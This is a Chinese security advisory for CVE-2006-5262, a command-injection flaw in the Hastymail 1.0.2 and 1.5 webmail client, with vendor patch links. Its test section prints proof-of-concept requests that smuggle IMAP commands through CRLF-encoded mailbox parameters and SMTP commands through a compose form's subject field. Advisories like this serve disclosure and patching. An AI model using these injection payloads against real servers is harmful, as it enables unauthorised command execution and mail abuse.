Hastymail IMAP/SMTP远程命令注入漏洞
发布日期:2006-10-09
更新日期:2006-12-04
受影响系统:Hastymail Hastymail 1.5
Hastymail Hastymail 1.0.2
描述:
BUGTRAQ ID:
20424
CVE(CAN) ID:
CVE-2006-5262
Hastymail是一个用PHP编写的快速、安全、兼容RFC、跨平台的IMAP/SMTP客户端应用程序。
Hastymail在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
拥有有效Hastymail帐号的用户可以通过在Hastymail变量中嵌入“命令结束”序列直接向IMAP或SMTP服务器发送命令。这允许远程攻击者绕过安全限制,尝试攻击IMAP或SMTP服务。
<*来源:Vicente Aguilera Diaz (
vaguilera@isecauditors.com)
链接:
http://secunia.com/advisories/22308/
http://hastymail.sourceforge.net/security.php
http://marc.theaimsgroup.com/?l=bugtraq&m=116525204427995&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE%2522INBOX.vad
POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
-----------------------------84060780712450133071594948441
...
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
.
mail from:
hacker@domain.com
rcpt to:
victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.
-----------------------------84060780712450133071594948441
...
建议:
厂商补丁:
Hastymail
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://hastymail.sourceforge.net/hastymail_1.5_command_injection_fix.diff
http://hastymail.sourceforge.net/hastymail_1.0.2_command_injection_fix.diff浏览次数:10595
严重程度:0(网友投票)
